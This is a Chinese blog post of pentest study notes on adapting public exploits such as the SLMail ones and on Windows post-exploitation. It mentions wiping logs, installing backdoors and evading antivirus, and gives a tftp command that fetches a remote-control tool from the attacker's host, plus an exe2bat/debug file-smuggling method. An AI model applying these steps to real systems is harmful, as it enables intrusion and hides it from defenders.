• kali linux之选择和修改exp与windows后渗透


    网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......)

    类unix坏境下编译              

        返回地址和环境不符合

        反弹shell硬编码了回链IP地址   

        缓冲区偏移量与我们的环境不符  

        目标IP硬编码

     

    如下测试

    查找slmail的exp

    把exp复制到当前目录下进行修改测试

    vim 638.py

    vim 643.c

    避免有害的exp,避免一锤子测试,满足不同环境需要,了解漏洞远离,修改溢出代码

     

     

    漏洞利用后阶段:

        上传工具(linux-----netcat----curl---wget。windows-----缺少预装的下载工具)

        提权

        擦除攻击痕迹(中间件日志,系统日志)

        安装后门(dump密码,内网渗透)

        后漏洞利用阶段(最大的挑战-----杀软,使用合法的远控)

     

     

    windows命令行不方便操作,最好能把远程控制的软件上传到服务器上,方便后续操作

     

    例如使用ftp来传输远控(ftp就不演示了,简单)

    xp,03默认安装了,08需要单独添加,而且经常被边界防火墙过滤

    思路就是在kali生成一个远控,或者其他更好的工具,本机开启tftp服务,在windows命令行下下载kali本机的远程控制工具(win:tftp -i 192.168.1.10 get xxsec.exe)

    使用debug传输

    汇编,反汇编,16进制dump工具,一次只能传输64k字节,可以使用upx压缩文件

    用exe2bat把二进制转换成16进制的表示(exe2bat是windows程序,要用wine来执行)

    exe2bat会把所有代码都生成好,复制好这些代码,除了最后两行,最后两行要在debug上操作

    把复制好的代码粘贴到windows的shell上,这时dir查看一下,能看到一个123.hexdir的文件

     然后到debug了,把x.txt的倒数第二行粘贴到windows的shell里面执行(123.hex作为输入,传输给debug)

     

    完成后,dir查看会多出来一个1.DLL的文件

    然后对它进行重命名

    再次dir查看,远控工具就上传上去了

     

    友情链接 http://www.cnblogs.com/klionsec

                   http://www.cnblogs.com/l0cm

                   http://www.cnblogs.com/Anonyaptxxx

                   http://www.feiyusafe.cn

  • 相关阅读:
    CSS布局:让页底内容永远固定在底部
    PHP+jQuery实现翻板抽奖
    【数据结构】Java 版本 链表常用操作
    【数据结构】Python3版本 链表常用操作
    Python爬虫学习第一记 (翻译小助手)
    2019年第十届蓝桥杯真题解析JavaC组 A.求和
    2019年第十届蓝桥杯真题解析Java C组 B 矩形切割
    Java 13天基础 06天map集合小练习(黑马程序员) 统计字符串中每个字符出现的次数 (经典面试题)
    2019年第十届蓝桥杯真题解析JavaC组 D: 质数
    Java 9天入门(黑马程序员) 课程收尾 学生管理系统 (9.13)
  • 原文地址:https://www.cnblogs.com/Hydraxx/p/10427007.html
Copyright © 2020-2023  润新知